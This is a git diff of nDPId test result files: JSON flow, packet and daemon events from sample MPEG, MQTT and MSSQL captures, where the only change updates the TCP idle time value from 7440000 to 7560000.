+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434379491117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1434379491117,"pkt":"PBXCt3IOyGyHABajCABFAAA8AABAADIGa5cuZZ13wKhQoABQ2fyPIjpcT+vGKaAScSAIFwAAAgQFqAQCCAoAu5vaFSiGAAEDAwhf8g=="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434379491117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1434379491117,"pkt":"yGyHABajPBXCt3IOCABFAAA02wVAAEAGgpnAqFCgLmWdd9n8AFBP68YpjyI6XYAQECCXiwAAAQEIChUohk0Au5va"} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":19,"total-skipped-flows":0,"total-l4-data-len":9363,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1434379491221} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 19/19 diff --git a/test/results/mqtt.pcap.out b/test/results/mqtt.pcap.out index 7f7c46555..7e707a17d 100644 --- a/test/results/mqtt.pcap.out +++ b/test/results/mqtt.pcap.out @@ -1,15 +1,15 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mqtt.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643014009283} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014009283,"flow_last_seen":1643014009283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643014009283,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643014009283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643014009283,"pkt":"AAAAAAAAAAwATSywCABFAAA8AABAADQGcggKCgoBwKgAAQdbo6QZpJjZwwPwU6AS\/oijvAAAAgQFtAQCCArcK3DSu1+3wwEDAwc="} -00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643014009286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643014009286,"pkt":"AAAAAAAAAAwATSywCABFAAB2fFxAAD8G6nHAqAABCgoKAaOkB1vDA\/BTGaSY2oAYAOXxcQAAAQEICrtfuBTcK3DSEEAABk1RSXNkcAPCABQAFmNiYWFiY2JhYmFjYmJiYmJhYWFhYWIADDAyRDUwNTAyMjNEMwAMMDJENTA1MDIyM0Qz"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643014009367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1643014009367,"pkt":"AAAAAAAAAAwATSywCABFAABUfF1AAD8G6pLAqAABCgoKAaOkB1vDA\/CVGaSY2oAYAOUsbgAAAQEICrtfuGXcK3Ejgh4AAQAZYXN0ci9zNzIwLzAyRDUwNTAyMjNEMy85OQA="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":355,"pkt_l4_len":317,"thread_ts_msec":1643014349216,"pkt":"AAAAAAAAAAIAAAAIgQAD8AgARQABUdTzQABABowKZEMj7jOJHO+I2wdbWSC31VrTd7uAGAGz9SgAAAEBCAoAXWNEhxKKyRCaAgAETVFUVATAAlgAEFA0Nzc3NUlEMTcwVzIxMjAASmlvdGF6ZXdwbWxpdGh1Yi5henVyZS1kZXZpY2VzLm5ldC9QNDc3NzVJRDE3MFcyMTIwLz9hcGktdmVyc2lvbj0yMDE4LTA2LTMwALBTaGFyZWRBY2Nlc3NTaWduYXR1cmUgc2lnPUtVNFVpQlRmV2UlMkZ4cyUyQmdURzVXUURMdnpyUHg0VTYySFRwU2xma2Z4cmZRJTNEJnNlPTE2NDMwMTc5NDcmc3I9aW90YXpld3BtbGl0aHViLmF6dXJlLWRldmljZXMubmV0JTJGUDQ3Nzc1SUQxNzBXMjEyMCUyRiUzRmFwaS12ZXJzaW9uJTNEMjAxOC0wNi0zMA=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014009283,"flow_last_seen":1643014009283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643014009283,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643014009283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643014009283,"pkt":"AAAAAAAAAAwATSywCABFAAA8AABAADQGcggKCgoBwKgAAQdbo6QZpJjZwwPwU6AS\/oijvAAAAgQFtAQCCArcK3DSu1+3wwEDAwc="} +00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643014009286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643014009286,"pkt":"AAAAAAAAAAwATSywCABFAAB2fFxAAD8G6nHAqAABCgoKAaOkB1vDA\/BTGaSY2oAYAOXxcQAAAQEICrtfuBTcK3DSEEAABk1RSXNkcAPCABQAFmNiYWFiY2JhYmFjYmJiYmJhYWFhYWIADDAyRDUwNTAyMjNEMwAMMDJENTA1MDIyM0Qz"} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643014009367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1643014009367,"pkt":"AAAAAAAAAAwATSywCABFAABUfF1AAD8G6pLAqAABCgoKAaOkB1vDA\/CVGaSY2oAYAOUsbgAAAQEICrtfuGXcK3Ejgh4AAQAZYXN0ci9zNzIwLzAyRDUwNTAyMjNEMy85OQA="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":355,"pkt_l4_len":317,"thread_ts_msec":1643014349216,"pkt":"AAAAAAAAAAIAAAAIgQAD8AgARQABUdTzQABABowKZEMj7jOJHO+I2wdbWSC31VrTd7uAGAGz9SgAAAEBCAoAXWNEhxKKyRCaAgAETVFUVATAAlgAEFA0Nzc3NUlEMTcwVzIxMjAASmlvdGF6ZXdwbWxpdGh1Yi5henVyZS1kZXZpY2VzLm5ldC9QNDc3NzVJRDE3MFcyMTIwLz9hcGktdmVyc2lvbj0yMDE4LTA2LTMwALBTaGFyZWRBY2Nlc3NTaWduYXR1cmUgc2lnPUtVNFVpQlRmV2UlMkZ4cyUyQmdURzVXUURMdnpyUHg0VTYySFRwU2xma2Z4cmZRJTNEJnNlPTE2NDMwMTc5NDcmc3I9aW90YXpld3BtbGl0aHViLmF6dXJlLWRldmljZXMubmV0JTJGUDQ3Nzc1SUQxNzBXMjEyMCUyRiUzRmFwaS12ZXJzaW9uJTNEMjAxOC0wNi0zMA=="} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00546{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-data-len":875,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1643014349216} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9/9 diff --git a/test/results/mssql_tds.pcap.out b/test/results/mssql_tds.pcap.out index 33315ceb2..8bc119e24 100644 --- a/test/results/mssql_tds.pcap.out +++ b/test/results/mssql_tds.pcap.out @@ -1,62 +1,62 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mssql_tds.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1240877917888} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1240877917888,"pkt":"AAwpiUrKAFBWwAABCABFAADynIJAAEAGGaUKb29vCgAAAQRXBZk+5C72WSFQkoAYAFx5qQAAAQEICgQLsN8AAVvMAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1240877917888,"pkt":"AFBWwAABAAwpiUrKCABFAABWA25AAIAGc1UKAAABCm9vbwWZBFdZIVCSPuQvtIAYQa2\/wgAAAQEICgABW8wEC7DfBAEAIgA1AQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} -00863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1240877917918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1240877917918,"pkt":"AAwpiUrKAFBWwAABCABFAAFYnINAAEAGGT4Kb29vCgAAAQRXBZk+5C+0WSFQtIAYAFxIvAAAAQEICgQLsOcAAVvMAwEBJAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANDQAQABQADAAIABuAHYAYQByAGMAaABhAHIAKAA0ADAAMAAwACkALABAAFAAMQAgAGkAbgB0AAAA50AfCQTQADSQAHMAZQBsAGUAYwB0ACAAKgAgAGYAcgBvAG0AIAB0AGUAcwB0AF8AdABhAGIAbABlAF8AMQAgAHcAaABlAHIAZQAgAG4AYQBtAGUAIAA9ACAAQABQADAAIABhAG4AZAAgAGkAZAAgAD0AIABAAFAAMQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAAA50AfCQTQADQGAHoAegB6AAAAJgQEAgAAAA=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1240877917888,"pkt":"AAwpiUrKAFBWwAABCABFAADynIJAAEAGGaUKb29vCgAAAQRXBZk+5C72WSFQkoAYAFx5qQAAAQEICgQLsN8AAVvMAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1240877917888,"pkt":"AFBWwAABAAwpiUrKCABFAABWA25AAIAGc1UKAAABCm9vbwWZBFdZIVCSPuQvtIAYQa2\/wgAAAQEICgABW8wEC7DfBAEAIgA1AQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} 